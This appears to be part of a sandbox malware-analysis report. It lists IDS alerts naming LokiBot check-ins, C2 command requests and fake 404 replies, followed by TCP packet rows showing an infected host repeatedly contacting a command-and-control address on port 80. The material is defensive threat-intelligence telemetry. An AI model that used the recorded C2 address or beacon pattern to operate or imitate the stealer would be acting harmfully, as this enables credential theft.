2025-01-07T12:33:50.308279+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:50.313200+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50127	TCP
2025-01-07T12:33:50.465759+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:50.465759+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:50.465759+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:51.192040+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:51.192040+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:51.196923+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50128	TCP
2025-01-07T12:33:51.347194+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:51.347194+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:51.347194+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:52.077623+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:52.077623+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:52.082481+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50129	TCP
2025-01-07T12:33:52.222675+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:52.222675+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:52.222675+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:53.256311+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:53.256311+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:53.261119+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50130	TCP
2025-01-07T12:33:53.621252+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:53.621252+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:53.621252+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:54.360403+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:54.360403+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:54.365193+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50131	TCP
2025-01-07T12:33:54.519173+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:54.519173+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:54.519173+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:55.263205+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:55.263205+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:55.268000+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50132	TCP
2025-01-07T12:33:55.412870+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:55.412870+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:55.412870+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:56.154405+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:56.154405+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:56.172324+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50133	TCP
2025-01-07T12:33:56.462921+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:56.462921+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:56.462921+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:57.175145+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:57.175145+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:57.179973+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50134	TCP
2025-01-07T12:33:57.340598+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:57.340598+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:57.340598+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:58.088991+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:58.088991+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:58.093795+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50135	TCP
2025-01-07T12:33:58.239632+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:58.239632+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:58.239632+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:58.979379+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:58.979379+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:58.984297+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50136	TCP
2025-01-07T12:33:59.128389+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:33:59.128389+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:33:59.128389+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:33:59.832529+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:33:59.832529+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:33:59.837375+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50137	TCP
2025-01-07T12:33:59.979403+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:33:59.979403+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:33:59.979403+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:34:00.722379+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:34:00.722379+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:34:00.727211+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	50138	TCP
2025-01-07T12:34:01.024157+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50139	94.156.177.41	80	TCP
2025-01-07T12:34:01.024157+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50139	94.156.177.41	80	TCP
2025-01-07T12:34:01.024157+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50139	94.156.177.41	80	TCP
2025-01-07T12:34:01.830408+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50139	94.156.177.41	80	TCP
2025-01-07T12:34:01.830408+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50139	94.156.177.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 12:32:00.784879923 CET	49735	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:00.789793015 CET	80	49735	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:00.789906025 CET	49735	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:00.792104959 CET	49735	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:00.796874046 CET	80	49735	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:00.796955109 CET	49735	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:00.801721096 CET	80	49735	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:01.519831896 CET	80	49735	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:01.519906044 CET	80	49735	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:01.519942999 CET	49735	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:01.519984961 CET	49735	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:01.524682999 CET	80	49735	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:01.742580891 CET	49737	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:01.747385979 CET	80	49737	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:01.747620106 CET	49737	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:01.749722958 CET	49737	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:01.754550934 CET	80	49737	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:01.754698992 CET	49737	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:01.759449959 CET	80	49737	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:02.466386080 CET	80	49737	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:02.466466904 CET	80	49737	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:02.466654062 CET	49737	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:02.466944933 CET	49737	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:02.471434116 CET	80	49737	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:02.538327932 CET	49739	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:02.543133974 CET	80	49739	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:02.543251991 CET	49739	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:02.545078993 CET	49739	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:02.549812078 CET	80	49739	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:02.549907923 CET	49739	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:02.554666042 CET	80	49739	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:03.274969101 CET	80	49739	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:03.275142908 CET	80	49739	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:03.275190115 CET	49739	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:03.311649084 CET	49739	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:03.316472054 CET	80	49739	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:03.590361118 CET	49740	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:03.595285892 CET	80	49740	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:03.595364094 CET	49740	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:03.597286940 CET	49740	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:03.602046967 CET	80	49740	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:03.602113962 CET	49740	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:03.606889963 CET	80	49740	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:04.338901043 CET	80	49740	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:04.338921070 CET	80	49740	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:04.338994980 CET	49740	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:04.339142084 CET	49740	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:04.346343994 CET	80	49740	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:04.478646994 CET	49741	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:04.483460903 CET	80	49741	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:04.483536959 CET	49741	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:04.485605955 CET	49741	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:04.490382910 CET	80	49741	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:04.490437984 CET	49741	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:04.495224953 CET	80	49741	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:05.248064995 CET	80	49741	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:05.248744011 CET	49741	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:05.248794079 CET	80	49741	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:05.248902082 CET	49741	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:05.262504101 CET	80	49741	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:05.400047064 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:05.404875994 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:05.405174971 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:05.407216072 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:05.412033081 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:05.412187099 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:05.416913986 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.009295940 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.009313107 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.009321928 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.009365082 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.009385109 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.009390116 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.009397030 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.009423971 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.009649038 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.009685040 CET	49742	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.014422894 CET	80	49742	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.175117970 CET	49743	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.180131912 CET	80	49743	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.180447102 CET	49743	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.182356119 CET	49743	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.187123060 CET	80	49743	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.187246084 CET	49743	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.192037106 CET	80	49743	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.934948921 CET	80	49743	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.935051918 CET	80	49743	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:07.935086012 CET	49743	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.935131073 CET	49743	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:07.939892054 CET	80	49743	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.072083950 CET	49744	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.076869965 CET	80	49744	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.076950073 CET	49744	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.078979969 CET	49744	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.083748102 CET	80	49744	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.083803892 CET	49744	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.088547945 CET	80	49744	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.818167925 CET	80	49744	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.818183899 CET	80	49744	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.818253994 CET	49744	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.818291903 CET	49744	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.824776888 CET	80	49744	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.963063955 CET	49745	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.967874050 CET	80	49745	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.967951059 CET	49745	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.969996929 CET	49745	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.974788904 CET	80	49745	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:08.974834919 CET	49745	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:08.979600906 CET	80	49745	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:09.731591940 CET	80	49745	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:09.731682062 CET	80	49745	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:09.731699944 CET	49745	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:09.731729984 CET	49745	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:09.737549067 CET	80	49745	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:09.874725103 CET	49746	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:10.066015959 CET	80	49746	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:10.066101074 CET	49746	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:10.068161011 CET	49746	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:10.073365927 CET	80	49746	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:10.073415041 CET	49746	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:10.078521013 CET	80	49746	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:10.792685986 CET	80	49746	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:10.792732000 CET	80	49746	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:10.797049999 CET	49746	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:10.802589893 CET	49746	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:10.807323933 CET	80	49746	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:11.202034950 CET	49747	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:11.207722902 CET	80	49747	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:11.207797050 CET	49747	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:11.218591928 CET	49747	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:11.223319054 CET	80	49747	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:11.223372936 CET	49747	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:11.228126049 CET	80	49747	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:11.917833090 CET	80	49747	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:11.917920113 CET	80	49747	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:11.917927027 CET	49747	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:11.917968035 CET	49747	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:11.922696114 CET	80	49747	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:12.105216980 CET	49749	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:12.110073090 CET	80	49749	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:12.110140085 CET	49749	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:12.112540960 CET	49749	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:12.117273092 CET	80	49749	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:12.117367983 CET	49749	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:12.122143030 CET	80	49749	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:12.853677034 CET	80	49749	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:12.853790045 CET	80	49749	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:12.853818893 CET	49749	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:12.853866100 CET	49749	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:12.858606100 CET	80	49749	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:12.992696047 CET	49751	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:12.997459888 CET	80	49751	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:12.997628927 CET	49751	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:12.999502897 CET	49751	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:13.004266977 CET	80	49751	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:13.004316092 CET	49751	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:13.009094954 CET	80	49751	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:13.756208897 CET	80	49751	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:13.756342888 CET	80	49751	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:13.756412983 CET	49751	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:13.756839037 CET	49751	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:13.761637926 CET	80	49751	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:13.916678905 CET	49754	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:13.921565056 CET	80	49754	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:13.921648026 CET	49754	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:13.924335957 CET	49754	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:13.931710958 CET	80	49754	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:13.932697058 CET	49754	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:13.937436104 CET	80	49754	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:14.646960020 CET	80	49754	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:14.647092104 CET	80	49754	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:14.647155046 CET	49754	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:14.647190094 CET	49754	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:14.651916981 CET	80	49754	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:14.793473959 CET	49756	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:14.798624992 CET	80	49756	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:14.798700094 CET	49756	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:14.800632954 CET	49756	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:14.805407047 CET	80	49756	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:14.805464983 CET	49756	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:14.810216904 CET	80	49756	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:15.593087912 CET	80	49756	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:15.593401909 CET	80	49756	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:15.593522072 CET	49756	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:15.593522072 CET	49756	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:15.599338055 CET	80	49756	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:15.756079912 CET	49758	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:15.760942936 CET	80	49758	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:15.761075974 CET	49758	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:15.764664888 CET	49758	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:15.769471884 CET	80	49758	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:15.769592047 CET	49758	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:15.774332047 CET	80	49758	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:16.533528090 CET	80	49758	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:16.533673048 CET	80	49758	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:16.533683062 CET	49758	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:16.533713102 CET	49758	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:16.538408995 CET	80	49758	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:16.682502031 CET	49759	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:16.687429905 CET	80	49759	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:16.687501907 CET	49759	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:16.689625978 CET	49759	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:16.694442034 CET	80	49759	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:16.694494009 CET	49759	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:16.699290037 CET	80	49759	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:17.444952011 CET	80	49759	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:17.444998980 CET	80	49759	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:17.445085049 CET	49759	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:17.445331097 CET	49759	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:17.450376034 CET	80	49759	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:17.609324932 CET	49760	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:17.614093065 CET	80	49760	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:17.614217043 CET	49760	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:17.616255999 CET	49760	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:17.621049881 CET	80	49760	94.156.177.41	192.168.2.4
Jan 7, 2025 12:32:17.621098995 CET	49760	80	192.168.2.4	94.156.177.41
Jan 7, 2025 12:32:17.625921965 CET	80	49760	94.156.177.41	192.168.2.4
